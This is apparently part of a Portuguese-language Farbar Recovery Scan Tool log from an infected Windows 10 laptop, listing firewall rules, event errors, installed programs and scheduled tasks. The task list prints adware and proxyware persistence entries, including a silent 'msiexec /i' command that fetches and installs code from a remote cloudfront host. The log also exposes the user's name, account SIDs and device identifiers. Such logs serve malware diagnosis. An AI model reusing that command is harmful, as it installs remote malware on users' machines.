FirewallRules: [{92AF8EA7-A1CB-4469-A038-97FE13AC4B68}] => (Allow) C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AllShareFrameworkDMS.exe
FirewallRules: [{3E90A035-0A06-42C7-A61C-B180B9465EEF}] => (Allow) C:\Program Files\Samsung\SamsungLink\AllShare Framework DMS\bin\AllShareFrameworkDMS.exe
FirewallRules: [{0B67AD48-0F93-4AEF-8E3E-C43F3DCA58BC}] => (Allow) LPort=1900
FirewallRules: [{6CA47467-CB8A-40D9-9294-65DB5E455911}] => (Allow) LPort=8643
FirewallRules: [{216A24B0-5EBA-4291-B17E-5E38BBC7D537}] => (Allow) LPort=8743
FirewallRules: [{AFD1D77E-0445-45E9-B46A-57256C390FE8}] => (Allow) LPort=7679
FirewallRules: [{08EB2BC4-6DBE-4741-B715-C41B678A143B}] => (Allow) LPort=7676
FirewallRules: [{91E54303-2840-462E-AEB0-B2E28479DC1D}] => (Allow) LPort=7900
FirewallRules: [{FE43B465-B546-4CE2-AA62-9661E5929DBB}] => (Allow) LPort=24234
FirewallRules: [{B5E246BE-2BC4-43F9-A62B-FAE22727A336}] => (Allow) C:\Program Files\Samsung\SamsungLink\SamsungLinkService.exe
FirewallRules: [{968530ED-C6A1-42C8-AA2E-C760AA33911F}] => (Allow) C:\Program Files\Samsung\SamsungLink\SamsungLinkService.exe
FirewallRules: [{9A613B24-41A9-42C7-9F0E-A0E08F1E52E9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{8B31FB4A-7876-4E9A-BE37-9704AAB66893}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{396E117D-473F-457A-926A-0259B9E0B1C2}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{EDE05F3B-B88C-4695-B124-2B0A5B712D92}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{5784884F-770E-4A29-B6C0-84CAC577E4D3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{2FB0A3F3-752F-48AA-ADA0-6BB7C2784821}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{4AE7BA58-818B-41A4-9067-AE29E074FFF7}] => (Allow) C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe
FirewallRules: [{ACE256C6-570B-4509-B88B-917640BA9762}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{8A034309-A474-4C57-9301-0A3042DDDB6D}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
FirewallRules: [{09965C46-46AA-4B1F-AA71-55973AE7D134}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{E2C3CE3D-02BA-4136-876D-CA73B32A9B15}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
==================== Pontos de Restauração =========================
24-04-2017 11:02:29 Removed ColorEngine
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (04/25/2017 11:16:45 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa SpyHunter4.exe versão 4.26.12.4815 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 6d0
Hora de Início: 01d2bdcdbf9654fb
Hora de Término: 5
Caminho do Aplicativo: C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
ID do Relatório: a0a0efe2-29c1-11e7-b735-988389627684
Nome completo do pacote com falha:
ID do aplicativo relativo ao pacote com falha:
Error: (04/25/2017 11:06:23 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5F8MUG8)
Description: Falha na ativação do aplicativo Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 10:51:25 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "c:\program files (x86)\microsoft office\root\office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política c:\program files (x86)\microsoft office\root\office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (04/24/2017 08:23:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5F8MUG8)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/24/2017 08:04:52 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe". Erro no arquivo de manifesto ou de política "", na linha .
Uma versão de componente exigida pelo aplicativo está em conflito com outra versão de componente já ativa.
Os componentes conflitantes são:
Componente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.0_none_2d0f50fcbdb171b8.manifest.
Componente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.0_none_74bc87d3d22d9abe.manifest.
Error: (04/24/2017 07:37:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-5F8MUG8)
Description: Falha na ativação do aplicativo Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/24/2017 07:37:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ShellExperienceHost.exe, versão: 10.0.14393.0, carimbo de data/hora: 0x578999c3
Nome do módulo com falha: twinapi.appcore.dll, versão: 10.0.14393.0, carimbo de data/hora: 0x57899849
Código de exceção: 0xc000027b
Deslocamento da falha: 0x000000000006d2c4
ID do processo com falha: 0x550
Hora de início do aplicativo com falha: 0x01d2bd4b140c401b
Caminho do aplicativo com falha: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Caminho do módulo com falha: C:\Windows\System32\twinapi.appcore.dll
ID do Relatório: f63697c7-e08f-4d69-b62b-aa9e3ba947f2
Nome completo do pacote com falha: Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy
ID do aplicativo relativo ao pacote com falha: App
Error: (04/24/2017 07:36:38 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Falha na enumeração de sessões de usuário para gerar pools de filtro.
Detalhes:
(HRESULT : 0x80040210) (0x80040210)
Error: (04/24/2017 07:36:38 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Falha na enumeração de sessões de usuário para gerar pools de filtro.
Detalhes:
(HRESULT : 0x80040210) (0x80040210)
Error: (04/24/2017 07:35:26 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Falha na enumeração de sessões de usuário para gerar pools de filtro.
Detalhes:
(HRESULT : 0x80040210) (0x80040210)
Erros de Sistema:
=============
Error: (04/25/2017 02:17:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 12:11:08 PM) (Source: BTHUSB) (EventID: 16) (User: )
Description: Falha na autenticação mútua entre o adaptador Bluetooth local e um dispositivo com endereço de adaptador Bluetooth (88:79:7e:29:26:5d).
Error: (04/25/2017 12:11:02 PM) (Source: BTHUSB) (EventID: 16) (User: )
Description: Falha na autenticação mútua entre o adaptador Bluetooth local e um dispositivo com endereço de adaptador Bluetooth (88:79:7e:29:26:5d).
Error: (04/25/2017 11:17:53 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:14:05 AM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-5F8MUG8)
Description: As configurações de permissão padrão-computador não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
e APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
ao usuário DESKTOP-5F8MUG8\vinicius SID (S-1-5-21-1165987581-522194205-1901974268-1001) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:11:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Windows Presentation Foundation Font Cache 3.0.0.0 devido ao seguinte erro:
O serviço não respondeu à requisição de início ou controle em tempo hábil.
Error: (04/25/2017 11:11:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço FontCache3.0.0.0.
Error: (04/25/2017 11:10:58 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:10:58 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 11:10:22 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço SamsungLinkService devido ao seguinte erro:
O serviço não respondeu à requisição de início ou controle em tempo hábil.
CodeIntegrity:
===================================
Date: 2017-04-25 11:08:45.860
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-25 11:08:39.856
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\Lace_wpf_x64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 19:31:54.129
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\32c7d8343dadb0fb9cd493a6a0cfa6a5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 19:31:53.756
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 19:31:13.391
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\Lace_wpf_x64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:48:16.968
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\32c7d8343dadb0fb9cd493a6a0cfa6a5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:48:16.745
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:48:08.236
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\Lace_wpf_x64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:40:03.942
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\32c7d8343dadb0fb9cd493a6a0cfa6a5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 13:40:03.704
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Informações da Memória ===========================
Processador: Intel(R) Pentium(R) CPU N3540 @ 2.16GHz
Percentagem de memória em uso: 54%
RAM física total: 3983.74 MB
RAM física disponível: 1793.23 MB
Virtual Total: 5391.74 MB
Virtual disponível: 2556.65 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:451.77 GB) (Free:266.21 GB) NTFS
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 26EA9241)
Partition: GPT.
==================== Fim de Addition.txt ============================
Executado por vinicius (25-04-2017 15:20:22)
Executando a partir de C:\Users\vinic\Downloads
Windows 10 Home Single Language Versão 1607 (X64) (2017-04-24 00:21:59)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-1165987581-522194205-1901974268-500 - Administrator - Disabled)
Convidado (S-1-5-21-1165987581-522194205-1901974268-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1165987581-522194205-1901974268-503 - Limited - Disabled)
teste (S-1-5-21-1165987581-522194205-1901974268-1002 - Administrator - Enabled) => C:\Users\teste
vinicius (S-1-5-21-1165987581-522194205-1901974268-1001 - Administrator - Enabled) => C:\Users\vinic
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Norton Security (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Disabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
1.0.0.1 (HKLM-x32\...\YeaDesktop) (Version: 1.0.0.1 - )
ColorEngine (HKLM-x32\...\{294D7592-989B-4EB9-BFCA-69545E0311E6}) (Version: 4.0 - Samsung Electronics CO., LTD.)
ETDWare X64 15.7.0.1_WHQL (HKLM\...\Elantech) (Version: 15.7.0.1 - ELAN Microelectronic Corp.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.81 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Intel(R) Chipset Device Software (x32 Version: 10.1.1.8 - Intel(R) Corporation) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Microsoft Office Professional Plus 2016 - pt-br (HKLM\...\ProPlusRetail - pt-br) (Version: 16.0.4266.1003 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1165987581-522194205-1901974268-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Norton Security (HKLM-x32\...\NS) (Version: 22.6.0.142 - Symantec Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Online Application (x32 Version: 2.6.0 - Microleaves) Hidden <==== ATENÇÃO
Online Support(S Service) (HKLM-x32\...\{C8996970-A56E-4659-B01B-CCB7097C4E59}) (Version: 1.1 - Samsung Electronics Co., Ltd.)
Peak Time Power Manager (HKLM-x32\...\{64D42C63-02D5-4129-A546-42BEC0D5AA77}) (Version: 1.0.0 - Samsung Electronics CO., LTD.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 10.0.1.5 - Qualcomm Atheros)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.31225 - Realtek Semiconduct Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.3.723.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7543 - Realtek Semiconductor Corp.)
S Agent (Version: 1.1.58 - Samsung Electronics Co., Ltd.) Hidden
Samsung Link (HKLM\...\{5A1F24BA-845E-4C89-BFF0-826FD9A6D4EB}) (Version: 2.0.1 - Samsung Electronics Co., Ltd.)
Samsung Recovery (HKLM\...\{D21EED26-59C0-4315-BDCC-D682496465E9}) (Version: 7.2.0 - Samsung Electronics Co., Ltd.)
Samsung Settings (HKLM-x32\...\{906320D6-3C1E-4C56-9B11-F17089D232F4}) (Version: 2.5.0 - Samsung Electronics Co., Ltd.)
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.1.3.399 - Samsung Electronics Co., Ltd.)
Samsung Update (HKLM-x32\...\{00935958-A0DE-45AF-A3EA-F6960A99785C}) (Version: 2.2.32 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Skype™ 7.1 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.1.105 - Skype Technologies S.A.)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.26.12.4815 - Enigma Software Group, LLC)
User Manual (HKLM-x32\...\{DA11CC4A-5E90-4EA9-8E7B-29D5328E35F0}) (Version: 1.4.00 - Samsung Electronics Co., Ltd.)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
XSplit Broadcaster (HKLM-x32\...\{ADDCAC95-651D-4897-9B47-2083C35EE497}) (Version: 2.9.1701.1635 - SplitmediaLabs)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-1165987581-522194205-1901974268-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {0AB9DACB-5FA2-4169-8AB1-18366B7FFE6C} - \SamsungLinkTray -> Nenhum Arquivo <==== ATENÇÃO
Task: {12E1CE2C-4A0C-4E75-9BA3-7FD2426B26B3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-23] (Google Inc.)
Task: {167BC114-B0E9-44F9-9170-7C9D8AD56979} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {26463823-3CB1-4796-8BDF-E6FAB1840493} - \Samsung\Settings\SettingsPatternLoginMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {276F96FC-8F20-4336-B260-BA0F5489C040} - System32\Tasks\Pritc => C:\Users\vinic\AppData\Local\Temp\is-671II.tmp\Setup.exe <==== ATENÇÃO
Task: {27F30408-1CCF-4027-815F-226CA1C8DDD8} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: {2BE3BCB0-1CBC-4CFE-86F7-DF60D0322DF4} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: {2CD54952-85F1-4213-B6BE-5FEDC58F5943} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-23] (Google Inc.)
Task: {3467C3BF-6A54-4AA5-938A-6F6BD01DA307} - \ColorEngine -> Nenhum Arquivo <==== ATENÇÃO
Task: {35FFC670-D8B1-4AE5-B351-AE48B5AEFAC2} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {3D89AF19-A876-4B20-97A0-58032E37CEA3} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-08-16] (Microsoft Corporation)
Task: {3F4FF200-E4EB-4267-89FA-B2681700779F} - System32\Tasks\Chfokchomeent Reports => C:\Program Files (x86)\Rerhphzujsy\xjaaing.exe [2017-04-24] (Google Inc.)
Task: {3F911C51-1A05-487F-ACFA-22CD8451D00B} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: {4127AE2D-38FE-4EF6-AF0B-E747CAAE2F3B} - System32\Tasks\Microsoft\Windows\SysResetDelayedCleanup => C:\WINDOWS\system32\ResetEngine.exe [2017-04-23] (Microsoft Corporation)
Task: {46121999-81DB-46AA-867B-A7CAE0513436} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\WSCStub.exe [2016-02-26] (Symantec Corporation)
Task: {51673C9A-C9AF-48AF-952B-3A1777EA0965} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-04-23] (Microsoft Corporation)
Task: {640CB1ED-4D9F-4C7B-AF9B-AAD40BD26658} - System32\Tasks\Nevetbsercult => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST500LM012XHN-M500MBB_S33XJ5CH600388&d=20170424 /q <==== ATENÇÃO
Task: {68C88969-7702-455F-9D65-292EC9B6FBD3} - \Samsung\Settings\LaunchSettings -> Nenhum Arquivo <==== ATENÇÃO
Task: {7A8C0450-A719-4EB2-8710-F02A5C4CA662} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\Explorer.exe /NOUACCHECK
Task: {82FB29CE-0EF3-4E0C-A717-3BA28448A7BC} - \PowerManagement -> Nenhum Arquivo <==== ATENÇÃO
Task: {A91B21E4-41F5-4EC3-ABC7-3CCEBE74B380} - \Samsung\SRS\SRS Logon -> Nenhum Arquivo <==== ATENÇÃO
Task: {B70B0B8F-017D-4B85-A112-ECFDF06FDB2B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-04-23] (Microsoft Corporation)
Task: {B870557D-6068-4A56-9A41-BAB790379CB4} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2017-04-24] (Enigma Software Group USA, LLC.)
Task: {B8BFA7F3-4414-41D0-84EB-C0AD6ECD411D} - \Samsung\Settings\SettingsHibernateMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {BD1DA6FC-A430-47C0-86DF-8AA460AA8A87} - \Samsung\Settings\SettingsPatternLoginAccountMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {c6fef78c-7663-4c5e-8b5c-5f78e4e10a71} - não caminho do arquivo
Task: {CAD514CD-C06A-4603-BE01-1B72CF638D45} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {D619036B-C463-499D-B14B-890C9A1E7D71} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-18] (Realtek Semiconductor)
Task: {D74A1BB1-4B8F-4388-BDD1-049C92C47C6D} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves)
Task: {DA6362A0-32F8-49B6-8043-5A02934E5F9C} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2016-02-26] (Symantec Corporation)
Task: {DF259C57-BCC7-4BBF-91E6-E49241786588} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-08-16] (Microsoft Corporation)
Task: {E9CEFF48-50BC-48D7-A5C3-F16F3360EF00} - System32\Tasks\{82ACF0E0-E53D-479D-ADAF-110FD00F4500} => pcalua.exe -a "C:\Program Files (x86)\YeaDesktop\unins000.exe"
Task: {EC749A47-F6AE-45BC-BF58-932773DCEDB8} - \SAgent -> Nenhum Arquivo <==== ATENÇÃO
Task: {F867B8DE-016B-4E65-8DB1-7EF609803898} - \Samsung\Settings\SettingsEventHandlerMonitor -> Nenhum Arquivo <==== ATENÇÃO
Task: {FE18B14D-B40F-4FCF-BFC3-DFA0EF84A965} - \SecTimeSync\TimeSyncInit -> Nenhum Arquivo <==== ATENÇÃO
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATENÇÃO
